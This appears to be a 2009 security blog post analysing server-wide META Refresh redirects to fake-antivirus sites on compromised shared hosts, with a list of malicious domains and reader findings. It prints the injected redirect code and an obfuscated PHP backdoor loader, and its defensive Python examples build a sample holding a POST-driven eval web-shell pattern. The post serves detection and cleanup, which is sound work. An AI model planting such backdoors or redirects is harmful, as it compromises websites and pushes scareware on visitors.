I’ve discovered a new emerging malware attack today. Actually two attacks, but in this post I’ll review only one of them – server-wide goscanpark .com/goscansoon .com meta redirects.
I discovered this attack when checking Unmask Parasites logs. I noticed that many unrelated websites contained the same suspicious script, so I decided to investigate. The investigation is not complete yet, but I think the information I've already collected will be useful for owners of compromised web sites, and I hope the missing parts will be added by you, the readers. Update (July 27, 2009): the comments are really very informative. Make sure to read them.
Fact #1. This exploit is well detected by Unmask Parasites (this is how I discovered it). When you check compromised sites, you will see a report with one suspicious inline script and no external references.
Fact #2. You won't see any external references even when your web pages link to external sites, because the malicious content replaces the original content of the web pages (it is not injected as a part of your web pages).
Fact #3. The original content of the web pages is not lost (overwritten). When you open your site in a web browser, in many cases you'll see the original content intact (and no malicious code at all).
Fact #4. The malicious content is not served all the time. When you view the site in a web browser, you are more likely to be served the legitimate original content. However, when you use tools like wget or Unmask Parasites, the chances that the response will be malicious are higher. I guess it has to do with cookies and the User-Agent header.
Fact #5. The malicious code is not always the same. There are two modifications:
1. This is what Unmask Parasites and tools like wget see:
This code only sets a cookie that expires in one day (they use octal numbers in the expression):
sessionid=39128605A531; path=/; expires=Fri, 24 Jul 2009 14:19:37 GMT
2. However when you load the same pages in a web browser (I used Firefox 3 with NoScript), the code is different:
This code injects meta tags that instruct your web browser to open a malicious site:
<META HTTP-EQUIV='Refresh' CONTENT='0; URL=hxxp://goscanpark,com/?uid=removed'>
<meta http-equiv='pragma' content='no-cache'>
<meta name='robots' content='noindex,nofollow'>
Fact #6. Goscanpark is a bogus Antivirus site. It distributes scareware (presumably packed with other trojans). You can read about this sort of sites and how they trick unsuspecting visitors into installing their fake AV scanners (and then paying for them) in my older articles that I posted this winter.
Fact #7. Unlike previous attacks that redirected only search engine traffic, this one can redirect any visitor. That's why it is easier to detect for site owners who rarely use search engines to visit their own sites.
Fact #8. However, the fact that the exploit is easier to detect doesn't mean it is easier to remove. This is not a .htaccess exploit, and it's not a redirect HTTP header injected by some server script. The attack uses a client-side redirect via a META tag's Refresh command instead of any type of server-side redirect. It doesn't seem to modify files.
Fact #9. The malicious code seems to be served by some PHP script. The HTTP headers of the malicious responses contain lines like "X-Powered-By: PHP/5.2.6", while static content doesn't have such headers.
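Because the malicious response is intermittent, a site owner needs a check that works on whatever a single fetch returns. As an added example (not code from the original post and not part of Unmask Parasites), the following Python script classifies a fetched response into the three shapes described in Facts #3 to #9: the clean page, the cookie-setting script variant and the META Refresh variant, and it also flags the X-Powered-By header on a URL that should be static. The sample responses are constructed to match those shapes; the octal-escaped cookie script, the uid value and the header set are assumptions, not captures.

```python
import re

# Constructed samples modelled on the three response shapes in the post
# (not real captures). The cookie-setting script spells "sessionid" with
# JavaScript octal escapes, which is an assumption about how the original
# script hid the cookie name.
CLEAN_BODY = "<html><head><title>My site</title></head><body><p>Hello</p></body></html>"
COOKIE_BODY = (r'<html><head><script>document.cookie="\163\145\163\163\151\157\156\151\144'
               r'=39128605A531; path=/; expires=Fri, 24 Jul 2009 14:19:37 GMT";</script>'
               r'</head><body></body></html>')
META_BODY = ("<html><head>"
             "<META HTTP-EQUIV='Refresh' CONTENT='0; URL=http://goscanpark.com/?uid=1234'>"
             "<meta http-equiv='pragma' content='no-cache'>"
             "<meta name='robots' content='noindex,nofollow'>"
             "</head><body></body></html>")
STATIC_HEADERS = {"Server": "Apache", "Content-Type": "text/html"}
PHP_HEADERS = {"Server": "Apache", "X-Powered-By": "PHP/5.2.6", "Content-Type": "text/html"}

# META Refresh with either quote style and any delay; captures the target URL.
META_REFRESH_RE = re.compile(
    r"""<meta\s+http-equiv\s*=\s*['"]?refresh['"]?\s+content\s*=\s*['"]\s*\d+\s*;\s*url=([^'"\s>]+)""",
    re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
OCTAL_RE = re.compile(r"\\([0-7]{1,3})")
SESSIONID_RE = re.compile(r"sessionid=([0-9A-Fa-f]+)")
# Extensions that Apache serves straight from disk; PHP headers here are out of place.
STATIC_EXT = (".html", ".htm", ".txt", ".css", ".js", ".gif", ".jpg", ".png")


def decode_octal(text):
    """Replace JavaScript octal escapes such as \\163 with the character they encode."""
    return OCTAL_RE.sub(lambda m: chr(int(m.group(1), 8)), text)


def classify(url, headers, body):
    """Return which variant a response is, plus the PHP-served indicator from Fact #9."""
    lower = {k.lower(): v for k, v in headers.items()}
    path = url.split("?", 1)[0].lower()
    result = {
        "variant": "clean",
        "redirect_url": None,
        "sessionid": None,
        "php_served": "php" in lower.get("x-powered-by", "").lower(),
    }
    result["php_on_static_url"] = result["php_served"] and path.endswith(STATIC_EXT)
    m = META_REFRESH_RE.search(body)
    if m:
        result["variant"] = "meta_refresh"
        result["redirect_url"] = m.group(1)
    else:
        # The cookie variant hides its strings behind octal escapes; decode before matching.
        for script in SCRIPT_RE.findall(body):
            decoded = decode_octal(script)
            if "document.cookie" in decoded:
                sm = SESSIONID_RE.search(decoded)
                if sm:
                    result["variant"] = "cookie"
                    result["sessionid"] = sm.group(1)
                    break
    result["suspicious"] = result["variant"] != "clean" or result["php_on_static_url"]
    return result


if __name__ == "__main__":
    for name, hdrs, body in (("clean", STATIC_HEADERS, CLEAN_BODY),
                             ("cookie", PHP_HEADERS, COOKIE_BODY),
                             ("meta", PHP_HEADERS, META_BODY)):
        print(name, classify("http://example.com/index.html", hdrs, body))
```

Run the classifier over several fetches of the same URL with different User-Agent headers and with no cookie jar, since Fact #4 says a single browser-like request will often get the clean page.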
Fact #10. This is a server-wide exploit. I checked three different servers in three different locations (the UK, Czechia and Singapore). They all hosted multiple (from dozens to hundreds of) websites sharing the same IP, and on about 80% of those websites I found the goscanpark redirect code. I guess I didn't find the malicious code on all sites only because of the intermittent nature of the exploit. And yes, most web sites were unrelated to each other (different owners). This reminds me of the Beladen server-wide exploit. Hackers must be using the same vulnerability.
Fact #11. Actually this exploit seems to be a successor of the Beladen exploit. On a safe browsing diagnostic page of one site I discovered the following message:
Malicious software is hosted on 3 domain(s), including beladen .net/, googleanalytlcs .net/, globalsecurityscans .com/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including googleanalytlcs .net/.
This is a sign of the Beladen attack. And I know that it was a server-wide exploit and all sites on the compromised server were affected. It looks like the backdoor script is still there and hackers used it to upload scripts for a new type of attack.
Fact #12. There are multiple domain names involved in this attack. In addition to goscanpark .com, on some servers the malicious code may redirect visitors to goscansoon .com, goslimscan .com, goscansome .com, securityexamineonline .com, globalsecurityscans .com, safetyshareonline .com, likeshoe .info, engaolika .info, neborin .info, fan6scan .com, scanriteweb .com, gagtemple .info, neatsore .info, rideth .info, ina6co .com, razing .info, scanwebtech .com, in5id .com, theise .info, licens .info, pridge .info, minist .info, cheapsecurityscan .com, worldbestonlinescan9 .com, justseethisonline .com, securityreadonline .com, botchy .info, best-virus-scanner5 .com, indianapolis-sales .com, securityproductsupply .com, securitytoolonline .com, senioradviceblog .com, nabobil .net, a-a-access .com, overviewforexbids .com, delete-all-virus01 .com, usdisturbed .cn, freetvnews2 .com, mycomputer-scannerp .com, wwwonlinescanner .com, read-cnn2 .com, winfixscanner9 .com, mycomputertotalscann11 .com, mycomputerbestscan11 .com, mycomputer-scanner1a .com, mycomputerfastscan11 .com, hollistergrany .cn, dolce-unt-gabbana .com, makkahintro .com, mytotalscan16 .com, my-garden-state .com, cradleoffilthfan .com, armysun3 .com, try-your-destiny .cn, forex-hideouts .com, (the list is not complete).
Fact #13. Google doesn't always detect this exploit. On the servers I checked, some sites were marked as suspicious while others (with the same scan date on their Safe Browsing diagnostic pages) weren't. It's either because some of the domain names no longer resolve (goscanpark .com) or because of the elusive nature of the exploit (the same was true of Beladen exploit detection).
Anyway, if the issue is not resolved, all sites can be blacklisted soon.
Now let me tell you how this exploit might work.
I assume this attack is indeed similar to the Beladen attack or it is its successor.
You can find more details about this Linux Apache attack in this great article.
If your site is affected by this attack, do the following:
My research is not complete. I’d like to hear from owners of affected sites and from server admins of compromised web servers. You can probably provide missing information about the attack or correct me if something in my article is not accurate. I’m also interested in any information about the vulnerability that makes this nasty attack possible. Any comments are welcome.
Update (October 15, 2009): There is a new modification of the backdoor PHP script that obfuscates the eval and base64_decode calls so that it can't be found with a simple regexp. Thanks, Thomas J. Raef.
<?php $PyIqJDl='#####e##############################v###a####l(b########a####s###e###########6##4##########_##d###eco###d####e#######(#\'ZXJyb3JfcmVwb3J0aW5nKDApOwokbWQ ***a lot of encoded text removed here for brevity*** Yz1iYXNlNjRfZGVjb2RlKCRjKTsKZXZhbCgkYyk7Cn0=\'));';
$PyIqJDl=str_replace('#', '', $PyIqJDl);$OOxbqtu=create_function('',$PyIqJDl);$OOxbqtu(); ?>
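To find this variant, a scanner has to tolerate the filler characters that str_replace() strips out before create_function() runs the string. As an added example, not the author's tool and not the backdoor itself, the following Python code builds a regex that matches eval(base64_decode( with any run of '#' between its letters, extracts the base64 payload, and replays the backdoor's own unwrapping to show what the payload decodes to. The sample file is constructed in the shape of the script above with a made-up payload; the variable names are reused from the post, and the inner PHP text is an assumption.

```python
import base64
import os
import re

FILLER = "#"  # the character the backdoor sprinkles into the call and later str_replace()s away

# Constructed inner payload, standing in for the encoded text elided in the post.
INNER_PHP = "error_reporting(0);\n$c = $_POST['c'];\neval(base64_decode($c));"


def stuffed(token, filler=FILLER):
    """Regex source matching `token` with any run of `filler` between its characters."""
    gap = re.escape(filler) + "*"
    return gap.join(re.escape(ch) for ch in token)


# eval(base64_decode( with filler allowed between every character, followed by the
# (possibly backslash-escaped) quote that opens the base64 payload.
STUFFED_EVAL_RE = re.compile(
    stuffed("eval(base64_decode(") + r"[#\s]*\\?['\"]([A-Za-z0-9+/=#\s]+?)\\?['\"]",
    re.IGNORECASE)
# The naive pattern most cleanup scripts use; it no longer matches the new variant.
PLAIN_EVAL_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)


def find_stuffed_eval(source):
    """Return the base64 payloads hidden behind '#'-stuffed eval(base64_decode( calls."""
    return [m.group(1) for m in STUFFED_EVAL_RE.finditer(source)]


def decode_payload(payload):
    """Replay the backdoor's own unwrapping: drop filler and whitespace, base64-decode."""
    clean = re.sub(r"[\s#]", "", payload)
    return base64.b64decode(clean).decode("utf-8", errors="replace")


def scan_tree(root):
    """Walk a directory and report PHP files that carry the stuffed eval pattern."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith((".php", ".inc")):
                full = os.path.join(dirpath, name)
                with open(full, "r", errors="replace") as fh:
                    if find_stuffed_eval(fh.read()):
                        hits.append(full)
    return hits


def build_sample():
    """Construct a file in the shape of the backdoor quoted in the post (not the real payload)."""
    b64 = base64.b64encode(INNER_PHP.encode()).decode()
    call = "eval(base64_decode("
    # Vary the filler run length per character so that some gaps are empty.
    stuffed_call = "".join(ch + FILLER * ((i * 7) % 4) for i, ch in enumerate(call))
    return ("<?php $PyIqJDl='" + stuffed_call + FILLER + "\\'" + b64 + "\\'));';\n"
            "$PyIqJDl=str_replace('#', '', $PyIqJDl);"
            "$OOxbqtu=create_function('',$PyIqJDl);$OOxbqtu(); ?>\n")


if __name__ == "__main__":
    sample = build_sample()
    print("plain regexp matches:", bool(PLAIN_EVAL_RE.search(sample)))
    for payload in find_stuffed_eval(sample):
        print("decoded payload:\n" + decode_payload(payload))
```

The same stuffed() helper can be applied to other tokens worth hunting for (create_function, str_replace with a one-character needle), and the filler character is a parameter because the next modification will not necessarily use '#'.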
July 27, 2009: At this point we have a few interesting comments:
Thomas J. Raef shared his client findings. On the affected shared server with 1,200 web sites they found a bogus "crontab" process running as user "nobody". When they killed the process, the attack stopped.
jamie also found those bogus crontab processes, then traced the /proc logs and identified the compromised account. Then he checked POST requests in access logs and located the backdoor scripts.
Chris posted his access logs with the POST requests that presumably started the attack.
Great comment from To: who shared
Thanks guys! Your comments make this post really informative and useful.
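The comments above describe the same hunt from the server side: find the process running as nobody, find the account, then look for POST requests in the access logs to locate the backdoor scripts. As an added example (not the commenters' own logs or scripts), the following Python code parses Apache combined-format access log lines and reports POST requests to PHP files that carry the usual signs of a dropped backdoor: no referring page, a script under a directory that should hold only static files, or a hidden directory in the path. The log lines are constructed for the example; the IP addresses, paths and the list of static directories are assumptions.

```python
import re
from collections import defaultdict

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')

# Directories that should never hold executed PHP; a script POSTed to here is a red flag.
STATIC_DIRS = {"images", "img", "uploads", "upload", "cache", "tmp", "files", "css", "js"}

# Constructed sample log (documentation IP ranges, made-up paths); not a real capture.
SAMPLE_LOG = """\
192.0.2.10 - - [20/Jul/2009:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [20/Jul/2009:14:02:12 +0000] "GET /style.css HTTP/1.1" 200 840 "http://example.com/index.html" "Mozilla/5.0"
203.0.113.7 - - [20/Jul/2009:14:05:40 +0000] "POST /images/.cache/x.php HTTP/1.1" 200 31 "-" "Mozilla/4.0"
203.0.113.7 - - [20/Jul/2009:14:05:41 +0000] "POST /images/.cache/x.php HTTP/1.1" 200 31 "-" "Mozilla/4.0"
198.51.100.3 - - [20/Jul/2009:14:06:02 +0000] "POST /contact.php HTTP/1.1" 302 0 "http://example.com/contact.php" "Mozilla/5.0"
203.0.113.7 - - [20/Jul/2009:14:07:15 +0000] "POST /files/upload/thumb.php?cmd=1 HTTP/1.1" 200 45 "-" "Mozilla/4.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def reasons_for(rec):
    """Return the backdoor indicators for a POST to a PHP script (empty list if none)."""
    if rec["method"] != "POST":
        return []
    path = rec["path"].split("?", 1)[0]
    if not path.lower().endswith(".php"):
        return []
    dirs = path.strip("/").split("/")[:-1]
    reasons = []
    if rec["referer"] in ("", "-"):
        reasons.append("no referer")
    if any(d.startswith(".") for d in dirs):
        reasons.append("hidden directory")
    if any(d.lower() in STATIC_DIRS for d in dirs):
        reasons.append("script under static directory")
    return reasons


def suspicious_posts(log_text):
    """Group flagged POSTs by (script path, client ip) with a hit count and the indicators."""
    hits = defaultdict(lambda: {"count": 0, "reasons": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = reasons_for(rec)
        if reasons:
            key = (rec["path"].split("?", 1)[0], rec["ip"])
            hits[key]["count"] += 1
            hits[key]["reasons"].update(reasons)
    return dict(hits)


if __name__ == "__main__":
    ranked = sorted(suspicious_posts(SAMPLE_LOG).items(), key=lambda kv: -kv[1]["count"])
    for (path, ip), info in ranked:
        print(f"{info['count']:3d}  {ip:15s}  {path}  [{', '.join(sorted(info['reasons']))}]")
```

This is a triage heuristic, not proof: a backdoor dropped next to legitimate scripts in the document root and driven with a fake Referer header will not be flagged, so treat every POST to a PHP file you did not put there as worth a look, and confirm by reading the file itself.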